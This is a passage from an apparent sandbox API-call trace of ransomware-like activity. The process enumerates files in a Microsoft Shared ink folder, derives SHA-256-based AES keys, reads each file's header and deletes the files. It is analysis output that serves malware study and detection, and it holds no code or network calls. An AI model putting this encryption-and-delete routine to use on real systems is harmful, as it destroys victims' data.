lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msitss55.dll", lpUsedDefaultChar=0x0) returned 13 [0137.522] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0137.522] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0137.523] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0137.523] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.523] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.523] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Alphabet.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Alphabet.xml", lpUsedDefaultChar=0x0) returned 13 [0137.552] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0137.553] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0137.553] CryptHashData (hHash=0x284d5e8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.553] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0137.553] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc1486 [0137.553] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0137.704] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0137.704] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0137.704] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.705] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0 [0137.705] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.728] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.728] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.728] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.728] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.728] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0137.728] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.729] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.729] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.729] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.729] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.729] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0137.729] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Content.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content.xml", lpUsedDefaultChar=0x0) returned 12 [0137.729] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0137.730] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0137.730] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.730] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0137.730] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x69a5 [0137.730] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0137.734] CryptDestroyHash (hHash=0x284d568) returned 1 [0137.734] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0137.734] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.735] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0 [0137.735] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConvertInkStore.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConvertInkStore.exe", lpUsedDefaultChar=0x0) returned 20 [0137.735] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.736] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.736] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.736] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.736] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.736] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.736] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.736] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.736] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.736] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.736] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.736] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.736] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.737] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.737] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.737] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.737] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.737] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.737] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.738] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.738] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.738] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.738] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.738] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.738] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.739] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.739] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.739] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="boxed-correct.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-correct.avi", lpUsedDefaultChar=0x0) returned 18 [0137.740] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.740] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.740] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.741] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.741] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15e00 [0137.741] ReadFile (in: hFile=0x410, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.761] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0137.761] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.761] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.762] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0 [0137.763] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="boxed-delete.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-delete.avi", lpUsedDefaultChar=0x0) returned 17 [0137.764] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.764] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.764] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.764] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.765] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7c00 [0137.765] ReadFile (in: hFile=0x414, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.768] CryptDestroyHash (hHash=0x284d628) returned 1 [0137.768] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.768] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.770] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0 [0137.770] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="boxed-join.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-join.avi", lpUsedDefaultChar=0x0) returned 15 [0137.770] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.771] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.771] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.771] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.771] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8200 [0137.771] ReadFile (in: hFile=0x410, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.778] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0137.778] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.778] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.779] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0 [0137.780] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="boxed-split.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-split.avi", lpUsedDefaultChar=0x0) returned 16 [0137.788] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.789] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.789] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.789] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.789] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf600 [0137.789] ReadFile (in: hFile=0x414, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.794] CryptDestroyHash (hHash=0x284d628) returned 1 [0137.794] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.794] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.795] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0 [0137.795] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="correct.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="correct.avi", lpUsedDefaultChar=0x0) returned 12 [0137.803] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.804] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.804] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.804] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.804] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30200 [0137.804] ReadFile (in: hFile=0x410, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.815] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0137.815] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.815] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.816] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0 [0137.817] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="delete.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="delete.avi", lpUsedDefaultChar=0x0) returned 11 [0137.818] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.819] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.819] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.819] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.819] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36c00 [0137.819] ReadFile (in: hFile=0x414, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.830] CryptDestroyHash (hHash=0x284d628) returned 1 [0137.831] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.831] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.832] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0 [0137.832] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickLearningWizard.exe.mui", lpUsedDefaultChar=0x0) returned 28 [0137.832] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InkObj.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkObj.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0137.832] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InkWatson.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkWatson.exe.mui", lpUsedDefaultChar=0x0) returned 18 [0137.832] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InputPersonalization.exe.mui", lpUsedDefaultChar=0x0) returned 29 [0137.832] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPSEventLogMsg.dll.mui", lpUsedDefaultChar=0x0) returned 23 [0137.832] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsMigrationPlugin.dll.mui", lpUsedDefaultChar=0x0) returned 27 [0137.832] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="join.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="join.avi", lpUsedDefaultChar=0x0) returned 9 [0137.833] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.833] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.833] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.833] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.833] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36400 [0137.833] ReadFile (in: hFile=0x410, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.845] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0137.845] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.845] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.846] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0 [0137.846] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="micaut.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="micaut.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0137.846] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mip.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mip.exe.mui", lpUsedDefaultChar=0x0) returned 12 [0137.847] FindNextFileW (in: 